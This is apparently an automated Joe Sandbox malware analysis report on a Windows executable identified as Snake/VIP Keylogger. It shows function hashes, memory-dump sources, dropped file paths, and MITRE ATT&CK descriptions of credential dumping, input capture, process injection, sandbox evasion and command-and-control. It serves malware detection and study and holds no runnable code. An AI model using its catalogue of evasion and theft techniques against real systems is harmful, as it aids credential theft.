Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 705bf6195cd7b6e717a5bd6a7af9e3e73fdec5fe67cb42851faaab353f7ff2a7
Instruction ID: 8c052e06c30e4573b8c9c2a68baea0a4fb287eae6563a9af6353843753e35374
Opcode Fuzzy Hash: 705bf6195cd7b6e717a5bd6a7af9e3e73fdec5fe67cb42851faaab353f7ff2a7
Instruction Fuzzy Hash: 3C113D74D001099FCB44EFA9D58069EBFF2FB84304F10D669D01897368EB346A458B80

Function 0134D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145014506.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_134d000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: c4e22cf5022e62cada96f0e063beceb9c736fed1c8f0f21f3f2afcb5287fd94a
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 8C11BB75504284CFDB12CF54C9C4B16BFA2FB88318F24C6AED8494B252C33AE44ACB62

Function 02CC27F0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a7d6667db78699763721768d7a63e2de86e1b01fb45a0f602ca66d9c10bafae
Instruction ID: c507549212a1dd101cb5be64eb4c849d5db919b1b924f5ac37cb3982f871f80c
Opcode Fuzzy Hash: 0a7d6667db78699763721768d7a63e2de86e1b01fb45a0f602ca66d9c10bafae
Instruction Fuzzy Hash: 3421CF75D1060A8FCB40EFA9D9456EEBBF4FF09310F10552AE809B6210EB306A84CFA1

Function 02CC5E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b74dc8d0eaaf0ef9d20b3a8ef7f0029c61ae6f347b0ce049f2d7c1348374cfd
Instruction ID: fd40d068c16e0c42b792b95f501bede3e167e819a240e799a35fb540c4e4d81e
Opcode Fuzzy Hash: 3b74dc8d0eaaf0ef9d20b3a8ef7f0029c61ae6f347b0ce049f2d7c1348374cfd
Instruction Fuzzy Hash: 7D014C327002546FCB019E9898506EF7FBBDBC9390F14801EF905DB280CE758D129794

Function 02CCABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b5c337b04ed2299a5c6d15f13d5e5b5d77954cb223849bb88e7517e6d5d5f5
Instruction ID: b8fa9192dfb7daaba1b37292daa058a257d39e7e79024c237fe719b58b1da1ac
Opcode Fuzzy Hash: 40b5c337b04ed2299a5c6d15f13d5e5b5d77954cb223849bb88e7517e6d5d5f5
Instruction Fuzzy Hash: D0F06835300A184B87255E2ED85C66AB79EEFC9A55765406DE509CB361DF21CD038790

Function 02CCE8E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1808be64a5cfdc5a93331b505454d31295221a0b6597d67af93940494a1dffb2
Instruction ID: 52781acd4c7d01dd4e3f4d114b046f23667d28ab1060b843b617db81662bab4b
Opcode Fuzzy Hash: 1808be64a5cfdc5a93331b505454d31295221a0b6597d67af93940494a1dffb2
Instruction Fuzzy Hash: A71129B8D0420AEFCF41DFE8D9449AEBBB1FB89304F014566E914A3354D7346A16DF92

Function 02CC28AA Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bf1ad697de4327e78ceb784c6643f4e4fc6499b9979828ed2a64310aa3cb2d
Instruction ID: f71dc8f4b2c8555ee72265e641e24212214373c59a276334d342abc58e29f9d3
Opcode Fuzzy Hash: e3bf1ad697de4327e78ceb784c6643f4e4fc6499b9979828ed2a64310aa3cb2d
Instruction Fuzzy Hash: B4E0C232D2022A97CB00EBA1EC008EEB738EE85720F808626E55437000EF307659C7A2

Function 02CC28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a3ebf73a34a7aa3b5adfe9826a7bb056437bda88e6021ed798385f6aef30ddf
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 6a3ebf73a34a7aa3b5adfe9826a7bb056437bda88e6021ed798385f6aef30ddf
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 02CC6739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7090de90ca90acb2f7cb1e22af8121cc22a81f3c1eab7c91f1e768d358752e92
Instruction ID: 6a37b8f44b58de022336ad263a6bf2ed893b6c67cc25218357dbc2f252522054
Opcode Fuzzy Hash: 7090de90ca90acb2f7cb1e22af8121cc22a81f3c1eab7c91f1e768d358752e92
Instruction Fuzzy Hash: 49D05B3140C3D04DCF03F375BD644967F769B833007095AB1D0444A1EFDB7859499364

Function 02CCD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35943985bdabffe8da0f249b4bb585e98f398614b79914c731871a0d7f695315
Instruction ID: 060727603acc86f6f42a520397a1d112c89c81486de71cb609691ad91f8b1f66
Opcode Fuzzy Hash: 35943985bdabffe8da0f249b4bb585e98f398614b79914c731871a0d7f695315
Instruction Fuzzy Hash: A0D0E234E10408CBCF30EFA8E4854DCBB70EB48322F20502AE825E3210CA705450CF11

Function 02CCAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ac9da295d2972e2616798bb903c738ef31147d9a1199602acc2bace1bd9176
Instruction ID: a7212c07af6c2772625f019c3e4d4eb197aef80b760e07bacff7ab4901eff315
Opcode Fuzzy Hash: 31ac9da295d2972e2616798bb903c738ef31147d9a1199602acc2bace1bd9176
Instruction Fuzzy Hash: 2ED0173AB00008DFCB008F88E8408DDFBB6FB98320B048016F911A3220CA319821CB50

Function 02CC6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c2a9b79312c89aa6d8c81ed0b6c14b5369dd7e9ef9fb1e47a37b7986863f74c
Instruction ID: efe68b6b7c9bf7c57463aa5e39b4f9dd9e9e80c2d17ea5a9735d6e4849eb36b8
Opcode Fuzzy Hash: 9c2a9b79312c89aa6d8c81ed0b6c14b5369dd7e9ef9fb1e47a37b7986863f74c
Instruction Fuzzy Hash: A7C012304447198EC905F766ED55555B72EABC0204B448A20A4050A65DDF7868894694

Non-executed Functions

Function 02CCF631 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22609213fe0421d634ff6ea48c38d3c69cf53ef5faba5418f3199a6e65af42a0
Instruction ID: 68e64ef3c97a5b09a4c2e5d22b64248178e7eb7188c5cead2d520775e46fa44b
Opcode Fuzzy Hash: 22609213fe0421d634ff6ea48c38d3c69cf53ef5faba5418f3199a6e65af42a0
Instruction Fuzzy Hash: E7C1A274E01218CFDB14DFA9C994B9DBBB2BF89304F2081A9D409AB365DB359E85CF50

Function 02CCFA88 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aee7e0e825774c43849cfe10505759fadf12d30a0b2cfe9a9604c349b045f98
Instruction ID: eac26ab0a505dfeb852fdab30e108f0a0ab62796e154f3708bfe99ec643a163d
Opcode Fuzzy Hash: 4aee7e0e825774c43849cfe10505759fadf12d30a0b2cfe9a9604c349b045f98
Instruction Fuzzy Hash: 34C19274E01218CFDB54DFA9C994B9DBBB2BF89304F2081AAD409AB355DB359E85CF10

Function 02CC2A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

Xbq, xrefs: 02CC2AD8
Xbq, xrefs: 02CC2B57
Xbq, xrefs: 02CC2BA4
Xbq, xrefs: 02CC2A9E

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 5cc9397aa7a4837b950ac702660bec2e162261cb0d5453084968b465f91cf3d4
Instruction ID: 38e24474419cb2cf52946f33d6243c3c62ca81bb48bf50ba0379cfda822f9489
Opcode Fuzzy Hash: 5cc9397aa7a4837b950ac702660bec2e162261cb0d5453084968b465f91cf3d4
Instruction Fuzzy Hash: 6A313271D442198BDF64DF69899076FB6B6AB84300F2444BDC916A7294DB30CA81CF93

Function 02CC6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 02CC6936
\;^q, xrefs: 02CC695E
\;^q, xrefs: 02CC692C
\;^q, xrefs: 02CC6952

Memory Dump Source

Source File: 00000004.00000002.4145272240.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_2Lzx7LMDWV.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: e506afda967d3eaf6d17c259773bf0788c21d504567fcc6f7cca2119f6db6721
Instruction ID: 7526f53341c26936b5aa50f27d162ab25dac7cfb2616f6b035f64c929d47910c
Opcode Fuzzy Hash: e506afda967d3eaf6d17c259773bf0788c21d504567fcc6f7cca2119f6db6721
Instruction Fuzzy Hash: 25012831B402159FCB6C8E2EC644A2677EFAFC8A64735456EE44ACB3B4DA31EC41C791

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2Lzx7LMDWV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2Lzx7LMDWV.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3aih0hza.nam.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsa3qsnl.1qu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_to43g1ae.30c.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xd32leeb.h0h.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
2Lzx7LMDWV.exe

Function 0514793C Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Function 009FD289 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Function 009FD298 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 05147948 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 009FAED7 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Function 009F44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 009F58F0 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Function 051476B9 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Function 051476C0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 05147521 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 009FD4D9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 051477A9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre